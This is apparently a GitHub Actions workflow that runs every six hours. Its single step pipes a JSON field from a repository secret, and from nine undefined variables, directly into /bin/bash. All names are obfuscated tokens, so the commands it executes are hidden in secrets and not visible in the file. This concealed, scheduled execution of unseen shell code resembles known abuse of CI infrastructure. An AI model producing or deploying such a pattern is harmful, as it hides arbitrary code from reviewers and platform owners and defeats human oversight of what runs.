name: jinxiusx
on:
  workflow_dispatch:
  schedule:
    - cron: '54 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jinxiusx
        env:
          w8472: ${{ secrets.w8472 }}
        run: |
          echo $w8472 | jq -r .lmqet5029 | /bin/bash
          echo $gycn2 | jq -r .yqzoi533 | /bin/bash
          echo $v21816 | jq -r .qh2325 | /bin/bash
          echo $chy37 | jq -r .l5837 | /bin/bash
          echo $my8 | jq -r .ebm639 | /bin/bash
          echo $hw31220 | jq -r .ebhyt79 | /bin/bash
          echo $p169 | jq -r .x61 | /bin/bash
          echo $asj88 | jq -r .gxz4768 | /bin/bash
          echo $spue1144 | jq -r .kwr9209 | /bin/bash
          echo $snt272 | jq -r .yjg1 | /bin/bash

